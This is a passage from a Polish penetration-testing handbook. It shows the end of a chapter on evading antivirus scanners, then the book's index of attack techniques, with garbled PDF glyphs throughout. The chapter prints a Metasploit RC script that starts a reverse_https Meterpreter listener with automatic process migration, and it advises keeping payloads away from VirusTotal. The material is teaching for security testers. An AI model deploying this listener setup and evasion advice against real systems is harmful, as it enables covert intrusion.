backdoor.exe -rw-r--r-- 1 root root 283 Dec 23 14:28 metasetup.rc -rw-r--r-- 1 root root 92 Dec 23 14:28 sha1-backdoor.hash W folderze z plikiem backdoor.exe znajduje si(cid:218) równie(cid:285) skrypt metasetup.rc. Skrypty RC s(cid:200) omawiane co prawda w rozdziale 9., ale po otwarciu pliku najprawdopodobniej zoba- czysz kod podobny do przedstawionego poni(cid:285)ej: spool /opt/smbexec/2013-12-23-1425-smbexec/msfoutput-1425.txt use exploit/multi/handler set payload windows/meterpreter/reverse_https set LHOST 172.16.139.209 set LPORT 443 set SessionCommunicationTimeout 600 set ExitOnSession false set InitialAutoRunScript migrate -f exploit -j -z Skrypt automatycznie konfiguruje narz(cid:218)dzie i uruchamia procedur(cid:218) obs(cid:239)ugi dla wygene- rowanego w(cid:239)a(cid:258)nie (cid:239)adunku. Dodaje równie(cid:285) polecenia zwi(cid:200)zane z przekroczeniem czasu i automatyczn(cid:200) migracj(cid:200) PID (ang. Process IDentifier). Aby uruchomi(cid:202) skrypt, wykonaj polecenie: msfconsole -r metasetup.rc PODSUMOWANIE Ten rozdzia(cid:239) powinien da(cid:202) dobre rozeznanie w tym, co nale(cid:285)y zrobi(cid:202), aby ukry(cid:202) si(cid:218) przed skanerem antywirusowym. Ostatni(cid:200) rzecz(cid:200), na której nam zale(cid:285)y, jest konfrontacja z pro- gramem antywirusowym powstrzymuj(cid:200)cym nas przed w(cid:239)amaniem si(cid:218) do systemu posia- daj(cid:200)cego luk(cid:218). Istnieje wiele ró(cid:285)nych metod oszukiwania programów antywirusowych — przedstawi(cid:239)em tylko kilka z nich, ale nawet one powinny da(cid:202) mo(cid:285)liwo(cid:258)(cid:202) dobrego ukry- cia si(cid:218). Testy penetracyjne polegaj(cid:200) na wypróbowywaniu ró(cid:285)nych narz(cid:218)dzi, technik, taktyk, by przekona(cid:202) si(cid:218), co dzia(cid:239)a w konkretnym (cid:258)rodowisku. Pami(cid:218)taj, (cid:285)eby nie wysy(cid:239)a(cid:202) plików wykonywalnych do systemów takich jak VirusTotal, poniewa(cid:285) czas (cid:285)ycia tych plików bez alarmowania o zagro(cid:285)eniu mo(cid:285)e si(cid:218) znacz(cid:200)co skróci(cid:202). 167 Kup książkęPoleć książkę PODR(cid:125)CZNIK PENTESTERA 168 Kup książkęPoleć książkę SKOROWIDZ A B adres EIP, 54 ADS, Alternate Data Streams, 181, 182 AES, Advanced Encryption Standard, 90 algorytmy skrótów, 170 analiza aktywna, 31 danych banerowych, 35 domeny, 28 pasywna, 23, 25 rozmieszczenia znaków, 77 ARP, Address Resolution Protocol, 111 atak aktywny, 144 CSRF, 73–76 dns_spoof, 115 fizyczny, 152 na kontroler domeny, 101 na WPS, 150 pasywny, 142 phishingowy, 128 Pretty Theft, 70, 71 SLAAC, 116 typu brute force, 79 typu DoS, 116 typu MITM, 116 typu XSS, 48, 66, 72 wykorzystuj(cid:200)cy SMTP, 125 wykorzystuj(cid:200)cy SSH, 127 z wykorzystaniem apletu Javy, 133 z zamian(cid:200) adresów DNS, 116 za pomoc(cid:200) BeEF, 69 zdalny, 52 automatyczne uruchamianie makra, 137 CSRF, Cross-Site Request Forgery, 49, 73 D dane logowania, 131 uwierzytelniaj(cid:200)ce, 85, 92 DHCP, Dynamic Host dodatek FoxyProxy, 41 domena, 90 DoS, Denial of Service, 116 dost(cid:218)p do domeny, 89 do komputera, 68 do konta administratora, 95 do OWA, 174 do profilu u(cid:285)ytkownika, 70 do SSH, 126 do systemu, 70 do witryny, 119 fizyczny, 141 dzia(cid:239)anie narz(cid:218)dzia Evade, 159 Hamster, 118 Mimikatz, 94 oclHashcat, 172 Peeping Tom, 39 Responder, 88 Smbexec, 102 SQLninja, 64 banery, 36 baza danych MongoDB, 35 bezpiecze(cid:241)stwo tokenów, 76 blokada odczytu pliku, 101 E edytor HxD, 159 EIP, Extended Insertion Point, 54 element APR-DNS, 121 emulacja punktu dost(cid:218)powego, 152 C F Configuration Protocol, 116, 152 generowanie e-maili, 129 plików Excela, 136 raportu, 130 GPP, Group Policy Preferences, 90 folder OSINT, 24 peepingtom, 35 framework, 191 BeEF, 66, 67 Impacket, 89 G H has(cid:239)a MD5, 171 NTLM, 169, 173 u(cid:285)ytkowników, 99 WEP, 145 I identyfikator SSID, 143 IIS, Internet Information Services, 36 informacje o AP i SSID, 143 lukach, 178 pingach, 65 plikach cookie, 120 Kup książkęPoleć książkę informacje o sesjach u(cid:285)ytkowników, 100 sieci Wi-Fi, 109 systemie, 110 (cid:258)rodowisku PowerShell, 109 wykorzystaniu luki, 58 instalowanie sshpass, 155 interaktywna pow(cid:239)oka, 60 in(cid:285)ynieria spo(cid:239)eczna, 125, 135, 156 J j(cid:218)zyk Python, 161 K Kali Linux, 15, 24 karta Alfa, 141, 142 Scanner, 47 Target, 43 klonowanie kart, 152 RFID, 152 strony uwierzytelniania, 121 witryny, 120 klucze AES, 91 do sieci Wi-Fi, 111 szyfruj(cid:200)ce, 90 kod frameworka BeEF, 68 kodowanie Base64, 106 kody CVE, 176 kompilacja sshd, 127 konferencje, 189 konfiguracja Kali Linux, 16 narz(cid:218)dzia Kismet, 143 narz(cid:218)dzia Veil, 97, 165 ODROID-U2, 154 platformy testowej, 21 proxy sieci, 41 przegl(cid:200)darki, 41 serwera Radius, 150 serwera SSH, 127 ustawie(cid:241) proxy, 42 zdalnego ataku, 52 kontroler domeny, 90 PODR(cid:125)CZNIK PENTESTERA s(cid:239)ów, 169 zalece(cid:241) i rozwi(cid:200)za(cid:241), 186 logowanie znaków, 163 LSASS, 93 luka, 51 22153, 176 BeEF, 66 GPP, 90 MS08-067, 53 przepe(cid:239)nienia bufora, 55 SQLi, 62 w Javie, 134 w WARFTP, 54 WPAD, 86 XSS, 69 luki rzeczywiste, 186 teoretyczne, 186 w aplikacjach webowych, 49, 83 (cid:146) (cid:239)adunek MeterHTTPSContained, (cid:239)amanie hase(cid:239), 145, 151, 169 96 MD5, 171 NTLM, 173 NTLMv2, 172 WEP, 146 WPAv2, 172 M makro Auto_Open, 137 ma(cid:239)a kradzie(cid:285), 70 masowa wysy(cid:239)ka e-maili, 134, 136 maszyna wirtualna, 20 migracja automatyczna, 167 migrowanie, 98 modu(cid:239) do Phishingu, 128 Incognito, 99 Intruder, 80 phishingowy Google, 70 psexec, 178 Repeater, 75 smart_hashdump, 99 modyfikacja sygnatury, 162 L N LDAP, Lightweight Directory Access Protocol, 102 lista APR, 112 hase(cid:239), 29, 170 nazw kont, 29 narz(cid:218)dzia dla Windows, 20 dodatkowe, 15 sprz(cid:218)towe, 152 narz(cid:218)dzie Ettercap, 114 198 BITSAdmin, 184 Burp Suite, 41, 43, 48, 58, 76–81 Cain and Abel, 20, 111, 121 Evade, 158 Evil Foca, 115, 116 Fern WIFI Cracker, 145, 147 Ferret, 117 Firesheep, 119 Hamster, 117 John the Ripper, 88 JtR, 171 Karma, 152 Karmetasploit, 152 Kismet, 143 Metasploit, 51, 52 Metasploit Pro, 129 Meterpreter, 54 Mimikatz, 93, 98 Nessus, 31 Nexpose, 31 Nishanga, 110 Nmap, 33, 37 oclHashcat, 88, 171–174 Peeping Tom, 37 PowerShell, 107, 108 Powersploit, 103 ProxBrute, 152 Proxmark3, 152 psexec, 100 PsExec, 95 py2exe, 163, 164 qwinsta, 100 Responder, 86, 87 RFIDIOt, 152 Searchsploit, 175 SET, 131, 134, 136 smbexec, 101, 166 SQLmap, 58 SQLninja, 61, 64 SSLStrip, 121, 122 Veil, 95, 96, 164 WCE, 157 Windows Credentials Editor, 92 nas(cid:239)uchiwanie pingów, 65 nazwa SSID, 109 niew(cid:239)a(cid:258)ciwe certyfikaty SSL, 49 NTLM, NT LAN Manager, 169 O obchodzenie UAC, 134 obs(cid:239)uga komunikacji, 98 oczyszczanie plików WPA, 149 odkrywanie tre(cid:258)ci, 45 zawarto(cid:258)ci, 46 Kup książkęPoleć książkę odwrócona pow(cid:239)oka, 133, 138, 164, 166 pow(cid:239)oka Meterpretera, 104 sesja HTTPS, 98, 107 omijanie zabezpiecze(cid:241) antywirusowych, 138, 157 filtrowania ruchu, 180 zabezpieczenia UAC, 179, 180 opcja Capture File Settings, 147 opcje polecenia skan, 34 oprogramowanie komercyjne, 14 OpenSSH, 127 OSINT, 187 OWA, Outlook Web Access, 174 OWASP, 73 P parametr GET, 59, 63 POST, 60–63 pasywne testowanie Wi-Fi, 142 Phishing, 128, 134 PID, Process IDentifier, 167 plik auth-passwd.c, 127 foundpw.csv, 29 Get-Information.ps1, 109 hook.js, 68 http_ips.txt, 38 InvokeShellcode.ps1, 104 ps_encoder.py, 137 report.html, 38 smbexec.sh, 166 smbrelayx.py, 89 StartListener.py, 104 pliki cookie, 119, 186 DLL, 103 Excela, 136 Searchsploita, 176 ukryte, 184 WCE, 158 WPA, 149 pobieranie danych uwierzytelniaj(cid:200)cych, 92 podanie boczne, 85 podobie(cid:241)stwo domen, 125 podróbka strony logowania, 132 podrzucanie urz(cid:200)dze(cid:241), 153 pods(cid:239)uchiwanie, 117, 142 polecenia PsExec, 100 w Fern WIFI Cracker, 146 polecenie Engagement tools, 46 exploit, 98 SKOROWIDZ getsystem, 99, 179 IEX, 105 ifconfig, 142 migrate, 98 ping, 65 searchsploit, 175 show payloads, 52 skan, 34 Spider this host, 44 Start attack, 81 pomoc programu SQLmap, 59 programu SQLninja, 62 ponawianie uwierzytelnienia, 144 popularne luki, 51 porównanie plików, 160 po(cid:258)wiadczenia, 95 potencjalne s(cid:239)abe punkty, 31 PowerShell, 90, 103, 105 pow(cid:239)oka j(cid:218)zyka Python, 162 pow(cid:239)oka Meterpretera, 105 preferencje zasad grupy, 90 problemy typu niskiego, 33 (cid:258)redniego, 33 protokó(cid:239) LDAP, 102 proxy mi(cid:218)dzy komputerami, 123 przechwytywanie banerów, 33 do pliku, 146 ekranu, 37 plików cookie, 119 ruchu internetowego, 43 wymiany uwierzytelniaj(cid:200)cej, 148 przekierowanie CNAME, 180 DNS, 119 przesy(cid:239)anie plików, 184 przeszukiwanie, 178 Metasploita, 52 witryny, 45 R raportowanie, 185 regu(cid:239)y, 170, 173 rejestrowanie naciskanych klawiszy, 163 rekonesans Wi-Fi, 142 rekordy MX, 126 rozg(cid:239)aszanie SSID, 143 S sekwenser, 77 serwer DHCP, 152 FTP, 56, 181 IIS, 36 199 proxy, 123, 180 Radius, 149 SMTP, 125 SSH, 127 WarFTP, 54 sesja Meterpretera, 107 SET, Social-Engineer Toolkit, 131 sfingowana strona uwierzytelniania, 122 sieci bezprzewodowe, 141 Wi-Fi, 144 zabezpieczone, 143 sie(cid:202) VPN, 30 skanery antywirusowe, 157 aplikacji webowych, 14 s(cid:239)abych punktów, 14 SNMP, 23 skanowanie adresów MAC, 112 aktywne, 47 aplikacji internetowych, 41 aplikacji webowych, 40 pliku, 159 sieci, 31 sieci, 23 witryn, 40 zewn(cid:218)trzne, 23 sklonowana strona logowania, 132 skrypt, Patrz tak(cid:285)e plik bash, 155 CRON, 155 wykorzystuj(cid:200)cy luk(cid:218), 55, 56 wyszukuj(cid:200)cy has(cid:239)a, 30 skrypty, 54 PowerShella, 103 Pythona, 161 zasobów, 178 SLAAC, 116 SMTP, Simple Mail Transfer Protocol, 125 specyfikacja urz(cid:200)dzenia ODROID-U2, 153 spo(cid:239)eczno(cid:258)ciowe (cid:283)ród(cid:239)a danych, 72 sprawdzanie danych, 76, 78 SQL, Structured Query Language, 49 SSH, Secure SHell, 126 SSL, Secure Sockets Layer, 49 status sesji, 46 strumienie danych, 181 sygnatura w(cid:239)(cid:200)czaj(cid:200)ca alarm, 161, 162 system Joomla, 176 logowania BeEF, 67 Kup książkęPoleć książkę szyfrowanie AES, 90 WEP, 144 WPA, 148 WPA-Enterprise, 149 WPAv2, 146, 148, 172 (cid:165) (cid:258)ci(cid:200)gawka OWASP, 73 T testowanie warto(cid:258)ci parametru, 79 witryny internetowej, 44 testy funkcjonalne, 82 penetracyjne, 13, 167 penetracyjne aplikacji webowych, 57 rozmyte, 79 token sesji, 76 tworzenie kont administracyjnych, 100 makra, 137 pliku Meterpretera, 164, 166 proxy mi(cid:218)dzy hostami, 123 U ukrywanie odwróconej pow(cid:239)oki, 166 plików, 181–183 uruchamianie ataku, 81 (cid:239)adunku, 106 niezaufanych skryptów, 108 odwróconej pow(cid:239)oki, 138 Searchsploit, 175 skanera aktywnego, 47 skryptu RC, 179 SQLninja, 64 urz(cid:200)dzenie ODROID-U2, 153 Pwn Plug, 153 PODR(cid:125)CZNIK PENTESTERA ustawienie typu ataku, 80 uwierzytelnianie NTLMv1, 89 u(cid:285)ycie adresów e-mail, 27 Burp Suite, 74 V VPN, Virtual Private Network, 30 W WCE, Windows Credentials Editor, 92 Windows Credentials Editor, 15 witryna Exploit Database, 176, 177 SecurityFocus, 177 w(cid:239)amanie do sieci bezprzewodowej, 141 do systemu, 94 wst(cid:218)pne, 103, 108 w(cid:239)(cid:200)czanie proxy, 42 WMI, Windows Management Instrumentation, 103 WPAD, Web Proxy Auto-Discovery, 86 WPAv2, Wi-Fi Protected Access, 146 WPS, Wi-Fi Simple Config, 148 wstrzykiwanie kodu SQL, 59, 65 wstrzykiwanie kodu SQL, 49, 57, 66 plików DLL, 103 potwierdze(cid:241) DHCP, 116 wybór tokena sesyjnego, 77 ustawie(cid:241) proxy, 43 wyciek (cid:258)cie(cid:285)ki WordPressa, 33 wydobywanie danych logowania, wyga(cid:258)ni(cid:218)cie sesji, 76 wykop na bok, 141 wykorzystanie luk BeEF, 66 wymagania sprz(cid:218)towe, 14 wymuszanie nowego po(cid:239)(cid:200)czenia, 131 152 wyniki ataku Pretty Theft, 71 testu w Burp Suite, 82 wysy(cid:239)anie (cid:285)(cid:200)dania, 75, 77, 80 du(cid:285)ej ilo(cid:258)ci e-maili, 134, 136 wyszukiwanie banerów, 36 s(cid:239)abych punktów, 175 stron witryny, 44 wy(cid:258)wietlanie administratorów domeny, 100 hase(cid:239) u(cid:285)ytkowników, 99 informacji o sesjach, 100 X XSS, Cross-Site Scripting, 48, 66 Z zabezpieczenie UAC, 180 zaciemnianie ataku XSS, 72 zamiana adresów DNS, 116 zasady grupy, 90 zast(cid:218)powanie cookie, 118 zatrucie ARP, 111, 113, 117 zbiór regu(cid:239) PasswordsPro, 172 zmienna Key_Content, 109 znajdowanie wstrzykni(cid:218)(cid:202) SQL, 58 luk, 57 zrzut ekranu, 108 pami(cid:218)ci procesu, 108 (cid:191) (cid:285)(cid:200)dania LLMNR, 86 NBT-NS, 86 (cid:285)(cid:200)danie GET, 48, 79 narz(cid:218)dzia Burp Suite, 62 200 Kup książkęPoleć książkę
Pobierz darmowy fragment (pdf)

Gdzie kupić całą publikację:

Podręcznik pentestera. Bezpieczeństwo systemów informatycznych
Autor:

Opinie na temat publikacji:


Inne popularne pozycje z tej kategorii:


Czytaj również:


Prowadzisz stronę lub blog? Wstaw link do fragmentu tej książki i współpracuj z Cyfroteką: